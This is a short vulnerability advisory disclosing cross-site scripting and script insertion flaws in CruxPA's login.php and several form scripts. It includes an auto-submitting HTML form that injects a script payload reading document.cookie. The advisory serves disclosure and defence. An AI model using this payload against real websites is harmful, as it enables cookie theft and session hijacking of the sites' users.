High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in CruxPA which could be exploited to perform cross-site scripting and script insertion attacks.
Cross-site scripting (XSS) vulnerability in CruxPA: CVE-2010-2718
The vulnerability exists due to input sanitation error in the “txtusername” parameter in login.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
<form method=“POST” action=“http://host/login.php” name=“main”>
<input type=hidden name=txtusername value=‘"><script>alert(document.cookie)</script>’>
<input type=hidden name=txtpassword value=‘’>
<input type=hidden name=cmdSubmit value=‘Submit’>
</form>
<script>
document.main.submit();
</script>
Script insertion vulnerabilities in CruxPA: CVE-2010-2718
An input sanitation error exists in the multiple fields in newtodo.php, newtelephone.php and newappointment.php scripts. A remote attacker can insert arbitrary HTML and script code, which will be executed in user`s browser in context of the vulnerable website when the user visits calendar.php or todo.php pages.